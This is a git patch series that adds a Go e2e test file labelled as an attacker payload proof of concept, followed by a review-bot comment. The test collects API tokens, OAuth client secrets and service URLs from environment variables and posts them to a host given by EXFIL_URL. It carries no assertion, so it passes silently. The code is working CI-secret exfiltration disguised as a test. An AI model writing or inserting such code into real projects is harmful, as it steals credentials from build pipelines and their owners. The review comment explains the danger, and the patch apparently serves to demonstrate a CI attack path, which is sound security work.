From ce3441e1f34b85b8a4fdb3e690f00764264892ec Mon Sep 17 00:00:00 2001
From: XavLim <50736074+XavLimSG@users.noreply.github.com>
Date: Sun, 5 Apr 2026 16:27:38 +0800
Subject: [PATCH 1/2] Add attacker payload test (commit A)

---
 poc/malicious_e2e_test.go | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 poc/malicious_e2e_test.go

diff --git a/poc/malicious_e2e_test.go b/poc/malicious_e2e_test.go
new file mode 100644
index 0000000..82b1cf6
--- /dev/null
+++ b/poc/malicious_e2e_test.go
@@ -0,0 +1,37 @@
+//go:build e2e
+
+package poc
+
+import (
+ "fmt"
+ "net/http"
+ "net/url"
+ "os"
+ "testing"
+)
+
+func TestMaliciousPayloadA(t *testing.T) {
+ exfil := os.Getenv("EXFIL_URL")
+ if exfil == "" {
+ t.Log("EXFIL_URL not set")
+ return
+ }
+
+ values := url.Values{}
+ values.Set("marker", "A")
+ values.Set("api_token", os.Getenv("API_TOKEN"))
+ values.Set("platform_token", os.Getenv("PLATFORM_TOKEN"))
+ values.Set("oauth_client_id", os.Getenv("OAUTH_CLIENT_ID"))
+ values.Set("oauth_client_secret", os.Getenv("OAUTH_CLIENT_SECRET"))
+ values.Set("oauth_token_endpoint", os.Getenv("OAUTH_TOKEN_ENDPOINT"))
+ values.Set("classic_url", os.Getenv("CLASSIC_URL"))
+ values.Set("platform_url", os.Getenv("PLATFORM_URL"))
+
+ resp, err := http.PostForm(exfil, values)
+ if err != nil {
+ t.Fatalf("exfil failed: %v", err)
+ }
+ defer resp.Body.Close()
+
+ fmt.Println("MALICIOUS_MARKER=A")
+}

From ab6f442391d9d2ed5ff5a2395e0dcbba46f464e2 Mon Sep 17 00:00:00 2001
From: XavLim <50736074+XavLimSG@users.noreply.github.com>
Date: Sun, 5 Apr 2026 16:29:00 +0800
Subject: [PATCH 2/2] Second attacker commit B

---
 poc/marker_b.txt | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 poc/marker_b.txt

diff --git a/poc/marker_b.txt b/poc/marker_b.txt
new file mode 100644
index 0000000..b86d7ff
--- /dev/null
+++ b/poc/marker_b.txt
@@ -0,0 +1 @@
+marker B
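Review bot: TestMaliciousPayloadA forwards API_TOKEN, PLATFORM_TOKEN, OAUTH_CLIENT_SECRET and the other listed environment variables to whatever host EXFIL_URL names, so this file must not be merged into a branch that CI builds with `-tags e2e` while secrets are present in the job environment; any workflow that runs tagged tests on unreviewed pull requests with secrets injected needs the same review. The test also contains no assertion: when EXFIL_URL is unset it returns after a `t.Log`, so `go test` reports a pass either way and the POST, if it happens, leaves no trace in the test result. If the file is meant to stay in the tree as a fixture for detection tooling, mark it as such at the top, e.g. `// PoC fixture: intentionally posts secret-bearing env vars to EXFIL_URL; must never be selected by a CI build tag`, and keep it behind a tag no pipeline enables.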